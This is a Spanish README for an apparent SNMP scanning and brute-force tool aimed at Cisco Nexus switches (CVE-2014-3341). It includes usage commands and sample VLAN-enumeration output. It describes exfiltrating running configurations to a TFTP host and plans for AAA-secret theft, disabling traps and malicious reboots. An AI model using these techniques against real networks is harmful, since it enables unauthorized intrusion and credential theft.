
Escáner SNMP y herramienta de fuerza bruta dirigida a switches Cisco Nexus (5000/6000) para explotar CVE-2014-3341, enumerar VLANs, descifrar cadenas de comunidad SNMP y extraer configuraciones de dispositivos.
CVE ID: CVE-2014-3341.
Cisco Bug ID: CSCup85616.
NexusTaco es un escáner SNMP que se puede utilizar tanto para pruebas internas como externas para evaluar switches Cisco Nexus (familia 5000 y 6000).
Hay muchos escáneres SNMP y herramientas de fuerza bruta; este se hizo solo por completitud. Tiene las siguientes características:
*Encuentra switches Nexus específicamente, ya que parecen responder a community strings falsas
*Fuerza bruta sobre IDs de VLAN que se pueden usar para ataques de Vlan hopping / doble etiquetado sin community string, en caso de que el punto #3 no dé resultado (útil para pruebas internas)
*Fuerza bruta sobre community strings SNMP para encontrar lo siguiente: **Tiempo de actividad del sistema **Redes configuradas (ganar más terreno)
**Archivos y carpetas
**Secreto y contraseña VTP (pueden descifrarse ya que es md5 y podría ser la contraseña de inicio de sesión por telnet si existe o se usa en otro lugar)
**Una vez que se encuentre una community string de escritura, el archivo de configuración en ejecución se enviará a la IP que establezcas en argv[2]. Necesitas configurar un servidor TFTP como el de SolarWinds o algo similar.
TODO:
*Sigo buscando OIDs ocultos que puedan proporcionar nombres de usuario configurados localmente en el switch
*Si se encuentra una community string SNMP privada, comprobar si hay un servidor AAA en ejecución (y obtener el secreto compartido, ya sea RADIUS o TACACS+)
*Mostrar usuarios conectados
*Deshabilitar trampas SNMP
*Comprobar la seguridad de puertos si está configurada, en caso de que necesites suplantar tu MAC para no perder tu puerto (pruebas internas).
*Usar getopt …..
*Recarga del router vía SNMP solo por maldad.
*Cualquier otra cosa que olvidé.
$ python NexusTaco.py python NexusTaco.py CIDR
$ python NexusTaco.py x.x.x.x/32 127.0.0.1 100
Gracias a nmap por la lista de IPs
Encontrando switches vulnerables
x.x.x.x:Is a nexus switch, Snmp open, Has Vlans configured
Finding VlanIDs on: x.x.x.x With incorrect community string
Host: x.x.x.x has VlanID 1 Configured
Host: x.x.x.x has VlanID 2 Configured
Host: x.x.x.x has VlanID 3 Configured
Host: x.x.x.x has VlanID 4 Configured
Host: x.x.x.x has VlanID 5 Configured
Host: x.x.x.x has VlanID 6 Configured
Host: x.x.x.x has VlanID 7 Configured
Host: x.x.x.x has VlanID 8 Configured
Host: x.x.x.x has VlanID 10 Configured
Host: x.x.x.x has VlanID 31 Configured
Host: x.x.x.x has VlanID 32 Configured
Host: x.x.x.x has VlanID 33 Configured
Host: x.x.x.x has VlanID 34 Configured
Host: x.x.x.x has VlanID 35 Configured
Host: x.x.x.x has VlanID 40 Configured
Host: x.x.x.x has VlanID 64 Configured
Host: x.x.x.x has VlanID 65 Configured
Host: x.x.x.x has VlanID 97 Configured
Host: x.x.x.x has VlanID 98 Configured
Host: x.x.x.x has VlanID 99 Configured
Host: x.x.x.x has VlanID 100 Configured
.....